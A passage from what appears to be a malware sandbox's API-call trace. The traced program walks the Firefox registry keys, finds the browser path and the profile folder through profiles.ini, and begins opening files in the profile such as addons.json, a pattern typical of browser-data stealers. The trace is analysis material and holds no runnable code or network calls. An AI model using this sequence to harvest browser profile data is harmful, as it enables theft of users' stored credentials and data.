lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.232] lstrlenW (lpString="\\") returned 1 [0590.232] lstrlenW (lpString="Software\\Mozilla") returned 16 [0590.232] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0x5d3958 [0590.232] lstrlenW (lpString="Firefox") returned 7 [0590.232] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0590.232] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0x2ed7060 [0590.232] StrStrIW (lpFirst="Software\\Mozilla\\Firefox", lpSrch="Firefox") returned="Firefox" [0590.232] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2b0 | out: phkResult=0x52e2b0*=0x2e4) returned 0x0 [0590.232] RegQueryValueExW (in: hKey=0x2e4, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e298, lpData=0x0, lpcbData=0x52e2ac*=0x0 | out: lpType=0x52e298*=0x0, lpData=0x0, lpcbData=0x52e2ac*=0x0) returned 0x2 [0590.232] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.232] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e284 | out: phkResult=0x52e284*=0x2e4) returned 0x0 [0590.232] RegQueryValueExW (in: hKey=0x2e4, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e26c, lpData=0x0, lpcbData=0x52e280*=0x0 | out: lpType=0x52e26c*=0x0, lpData=0x0, lpcbData=0x52e280*=0x0) returned 0x2 [0590.232] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.232] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e258 | out: phkResult=0x52e258*=0x2e4) returned 0x0 [0590.232] RegQueryValueExW (in: hKey=0x2e4, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e240, lpData=0x0, lpcbData=0x52e254*=0x0 | out: lpType=0x52e240*=0x0, lpData=0x0, lpcbData=0x52e254*=0x0) returned 0x2 [0590.232] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.232] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edb848 [0590.232] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox", phkResult=0x52e2d8 | out: phkResult=0x52e2d8*=0x2e4) returned 0x0 [0590.232] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x2edb848, lpcchName=0x52e2d4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Crash Reporter", lpcchName=0x52e2d4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.232] lstrlenW (lpString="\\") returned 1 [0590.232] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0590.232] LocalAlloc (uFlags=0x40, uBytes=0xb4) returned 0x2ed7120 [0590.232] lstrlenW (lpString="Crash Reporter") returned 14 [0590.232] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0590.232] LocalAlloc (uFlags=0x40, uBytes=0xd0) returned 0x5977a0 [0590.232] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\Crash Reporter", lpSrch="Firefox") returned="Firefox\\Crash Reporter" [0590.232] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e274 | out: phkResult=0x52e274*=0x664) returned 0x0 [0590.233] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e25c, lpData=0x0, lpcbData=0x52e270*=0x0 | out: lpType=0x52e25c*=0x0, lpData=0x0, lpcbData=0x52e270*=0x0) returned 0x2 [0590.233] RegCloseKey (hKey=0x664) returned 0x0 [0590.233] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e248 | out: phkResult=0x52e248*=0x664) returned 0x0 [0590.233] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e230, lpData=0x0, lpcbData=0x52e244*=0x0 | out: lpType=0x52e230*=0x0, lpData=0x0, lpcbData=0x52e244*=0x0) returned 0x2 [0590.233] RegCloseKey (hKey=0x664) returned 0x0 [0590.233] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e21c | out: phkResult=0x52e21c*=0x664) returned 0x0 [0590.233] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e204, lpData=0x0, lpcbData=0x52e218*=0x0 | out: lpType=0x52e204*=0x0, lpData=0x0, lpcbData=0x52e218*=0x0) returned 0x2 [0590.233] RegCloseKey (hKey=0x664) returned 0x0 [0590.233] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edc8d0 [0590.233] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", phkResult=0x52e29c | out: phkResult=0x52e29c*=0x664) returned 0x0 [0590.233] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x2edc8d0, lpcchName=0x52e298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.233] RegCloseKey (hKey=0x664) returned 0x0 [0590.233] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x1, lpName=0x2edb848, lpcchName=0x52e2d4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x52e2d4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.233] lstrlenW (lpString="\\") returned 1 [0590.233] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0590.233] LocalAlloc (uFlags=0x40, uBytes=0xb4) returned 0x2ed7120 [0590.233] lstrlenW (lpString="TaskBarIDs") returned 10 [0590.233] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0590.233] LocalAlloc (uFlags=0x40, uBytes=0xc8) returned 0x5d5258 [0590.233] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\TaskBarIDs", lpSrch="Firefox") returned="Firefox\\TaskBarIDs" [0590.233] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e274 | out: phkResult=0x52e274*=0x664) returned 0x0 [0590.233] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e25c, lpData=0x0, lpcbData=0x52e270*=0x0 | out: lpType=0x52e25c*=0x0, lpData=0x0, lpcbData=0x52e270*=0x0) returned 0x2 [0590.233] RegCloseKey (hKey=0x664) returned 0x0 [0590.234] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e248 | out: phkResult=0x52e248*=0x664) returned 0x0 [0590.234] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e230, lpData=0x0, lpcbData=0x52e244*=0x0 | out: lpType=0x52e230*=0x0, lpData=0x0, lpcbData=0x52e244*=0x0) returned 0x2 [0590.234] RegCloseKey (hKey=0x664) returned 0x0 [0590.234] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e21c | out: phkResult=0x52e21c*=0x664) returned 0x0 [0590.234] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e204, lpData=0x0, lpcbData=0x52e218*=0x0 | out: lpType=0x52e204*=0x0, lpData=0x0, lpcbData=0x52e218*=0x0) returned 0x2 [0590.234] RegCloseKey (hKey=0x664) returned 0x0 [0590.234] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edc8d0 [0590.234] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", phkResult=0x52e29c | out: phkResult=0x52e29c*=0x664) returned 0x0 [0590.234] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x2edc8d0, lpcchName=0x52e298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.234] RegCloseKey (hKey=0x664) returned 0x0 [0590.234] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x2, lpName=0x2edb848, lpcchName=0x52e2d4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x52e2d4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.234] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.234] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x1, lpName=0x5e5080, lpcchName=0x52e310, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x52e310, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.234] RegCloseKey (hKey=0x4d0) returned 0x0 [0590.234] StrStrIW (lpFirst="Software\\Mozilla", lpSrch="Firefox") returned 0x0 [0590.234] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5e5080 [0590.234] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla", phkResult=0x52e300 | out: phkResult=0x52e300*=0x4d0) returned 0x0 [0590.234] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x0, lpName=0x5e5080, lpcchName=0x52e2fc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x52e2fc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.234] lstrlenW (lpString="\\") returned 1 [0590.234] lstrlenW (lpString="Software\\Mozilla") returned 16 [0590.234] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0x5d3958 [0590.234] lstrlenW (lpString="Firefox") returned 7 [0590.234] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0590.234] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0x2ed7060 [0590.234] StrStrIW (lpFirst="Software\\Mozilla\\Firefox", lpSrch="Firefox") returned="Firefox" [0590.234] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e29c | out: phkResult=0x52e29c*=0x2e4) returned 0x0 [0590.234] RegQueryValueExW (in: hKey=0x2e4, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e284, lpData=0x0, lpcbData=0x52e298*=0x0 | out: lpType=0x52e284*=0x0, lpData=0x0, lpcbData=0x52e298*=0x0) returned 0x2 [0590.235] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.235] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e270 | out: phkResult=0x52e270*=0x2e4) returned 0x0 [0590.235] RegQueryValueExW (in: hKey=0x2e4, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e258, lpData=0x0, lpcbData=0x52e26c*=0x0 | out: lpType=0x52e258*=0x0, lpData=0x0, lpcbData=0x52e26c*=0x0) returned 0x2 [0590.235] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.235] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e244 | out: phkResult=0x52e244*=0x0) returned 0x2 [0590.235] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edb848 [0590.235] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox", phkResult=0x52e2c4 | out: phkResult=0x52e2c4*=0x2e4) returned 0x0 [0590.235] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x2edb848, lpcchName=0x52e2c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x52e2c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.235] lstrlenW (lpString="\\") returned 1 [0590.235] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0590.235] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\TaskBarIDs", lpSrch="Firefox") returned="Firefox\\TaskBarIDs" [0590.235] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e260 | out: phkResult=0x52e260*=0x664) returned 0x0 [0590.235] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e248, lpData=0x0, lpcbData=0x52e25c*=0x0 | out: lpType=0x52e248*=0x0, lpData=0x0, lpcbData=0x52e25c*=0x0) returned 0x2 [0590.235] RegCloseKey (hKey=0x664) returned 0x0 [0590.235] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e234 | out: phkResult=0x52e234*=0x664) returned 0x0 [0590.235] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e21c, lpData=0x0, lpcbData=0x52e230*=0x0 | out: lpType=0x52e21c*=0x0, lpData=0x0, lpcbData=0x52e230*=0x0) returned 0x2 [0590.235] RegCloseKey (hKey=0x664) returned 0x0 [0590.235] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e208 | out: phkResult=0x52e208*=0x0) returned 0x2 [0590.235] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", phkResult=0x52e288 | out: phkResult=0x52e288*=0x664) returned 0x0 [0590.235] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x2edc8d0, lpcchName=0x52e284, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e284, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.236] RegCloseKey (hKey=0x664) returned 0x0 [0590.236] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x1, lpName=0x2edb848, lpcchName=0x52e2c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x52e2c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.236] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.236] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x1, lpName=0x5e5080, lpcchName=0x52e2fc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox", lpcchName=0x52e2fc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.236] lstrlenW (lpString="\\") returned 1 [0590.236] lstrlenW (lpString="Software\\Mozilla") returned 16 [0590.236] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox", lpSrch="Firefox") returned="Firefox" [0590.236] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e29c | out: phkResult=0x52e29c*=0x2e4) returned 0x0 [0590.236] RegQueryValueExW (in: hKey=0x2e4, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e284, lpData=0x0, lpcbData=0x52e298*=0x0 | out: lpType=0x52e284*=0x0, lpData=0x0, lpcbData=0x52e298*=0x0) returned 0x2 [0590.236] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.236] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e270 | out: phkResult=0x52e270*=0x2e4) returned 0x0 [0590.236] RegQueryValueExW (in: hKey=0x2e4, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e258, lpData=0x0, lpcbData=0x52e26c*=0x0 | out: lpType=0x52e258*=0x0, lpData=0x0, lpcbData=0x52e26c*=0x0) returned 0x2 [0590.236] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.236] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e244 | out: phkResult=0x52e244*=0x0) returned 0x2 [0590.236] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox", phkResult=0x52e2c4 | out: phkResult=0x52e2c4*=0x2e4) returned 0x0 [0590.236] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x2edb848, lpcchName=0x52e2c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="25.0 (en-US)", lpcchName=0x52e2c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.236] lstrlenW (lpString="\\") returned 1 [0590.236] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox") returned 32 [0590.236] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", lpSrch="Firefox") returned="Firefox\\25.0 (en-US)" [0590.236] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e260 | out: phkResult=0x52e260*=0x664) returned 0x0 [0590.236] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e248, lpData=0x0, lpcbData=0x52e25c*=0x0 | out: lpType=0x52e248*=0x0, lpData=0x0, lpcbData=0x52e25c*=0x0) returned 0x2 [0590.236] RegCloseKey (hKey=0x664) returned 0x0 [0590.236] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e234 | out: phkResult=0x52e234*=0x664) returned 0x0 [0590.237] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e21c, lpData=0x0, lpcbData=0x52e230*=0x0 | out: lpType=0x52e21c*=0x0, lpData=0x0, lpcbData=0x52e230*=0x0) returned 0x2 [0590.237] RegCloseKey (hKey=0x664) returned 0x0 [0590.237] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e208 | out: phkResult=0x52e208*=0x0) returned 0x2 [0590.237] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", phkResult=0x52e288 | out: phkResult=0x52e288*=0x664) returned 0x0 [0590.237] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x2edc8d0, lpcchName=0x52e284, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Main", lpcchName=0x52e284, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.237] lstrlenW (lpString="\\") returned 1 [0590.237] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)") returned 45 [0590.237] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", lpSrch="Firefox") returned="Firefox\\25.0 (en-US)\\Main" [0590.237] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e224 | out: phkResult=0x52e224*=0x5ac) returned 0x0 [0590.237] RegQueryValueExW (in: hKey=0x5ac, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e20c, lpData=0x0, lpcbData=0x52e220*=0x0 | out: lpType=0x52e20c*=0x1, lpData=0x0, lpcbData=0x52e220*=0x66) returned 0x0 [0590.237] RegQueryValueExW (in: hKey=0x5ac, lpValueName="PathToExe", lpReserved=0x0, lpType=0x0, lpData=0x2ed2060, lpcbData=0x52e220*=0x66 | out: lpType=0x0, lpData=0x2ed2060*=0x43, lpcbData=0x52e220*=0x66) returned 0x0 [0590.237] RegCloseKey (hKey=0x5ac) returned 0x0 [0590.237] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned 50 [0590.237] lstrlenW (lpString="") returned 0 [0590.237] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned 50 [0590.237] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpSrch=".exe") returned=".exe" [0590.237] StrRChrIW (lpStart="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpEnd=0x0, wMatch=0x5c) returned="\\firefox.exe" [0590.237] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox") returned 38 [0590.237] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0590.237] lstrlenW (lpString="\\Mozilla\\Firefox\\") returned 17 [0590.237] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 33 [0590.237] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.237] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox")) returned 0x2010 [0590.237] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox" (normalized: "c:\\program files (x86)\\mozilla firefox")) returned 0x10 [0590.238] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.238] lstrlenW (lpString="") returned 0 [0590.238] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.238] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed3050 [0590.238] lstrlenW (lpString="profiles.ini") returned 12 [0590.238] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.238] LocalAlloc (uFlags=0x40, uBytes=0xfe) returned 0x5d7c90 [0590.238] LocalAlloc (uFlags=0x40, uBytes=0xfe6a) returned 0x2edd958 [0590.238] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2eed7d0 [0590.238] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.238] CloseHandle (hObject=0x5ac) returned 1 [0590.238] GetPrivateProfileSectionNamesW (in: lpszReturnBuffer=0x2edd958, nSize=0xfde8, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpszReturnBuffer="General") returned 0x11 [0590.239] StrStrIW (lpFirst="General", lpSrch="Profile") returned 0x0 [0590.239] lstrlenW (lpString="General") returned 7 [0590.239] StrStrIW (lpFirst="Profile0", lpSrch="Profile") returned="Profile0" [0590.239] GetPrivateProfileStringW (in: lpAppName="Profile0", lpKeyName="Path", lpDefault="", lpReturnedString=0x2eed7d0, nSize=0xfff, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpReturnedString="Profiles/3y2joh8o.default") returned 0x19 [0590.240] GetPrivateProfileIntW (lpAppName="Profile0", lpKeyName="IsRelative", nDefault=1, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 0x1 [0590.241] lstrlenW (lpString="Profiles/3y2joh8o.default") returned 25 [0590.241] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.241] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x63d588 [0590.241] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.241] lstrlenW (lpString="\\*.*") returned 4 [0590.241] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.241] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x63d6b0 [0590.241] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\*.*", lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 0x57d1e0 [0590.241] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.241] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.241] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.241] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.241] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.241] lstrlenW (lpString="\\") returned 1 [0590.241] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.241] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.241] lstrlenW (lpString="addons.json") returned 11 [0590.241] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.241] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bbf0 [0590.241] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.241] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.241] CloseHandle (hObject=0x4c8) returned 1 [0590.241] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0590.241] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bd28 [0590.241] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", lpDst=0x63bd28, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json") returned 0x58 [0590.241] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.241] CloseHandle (hObject=0x4c8) returned 1 [0590.241] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 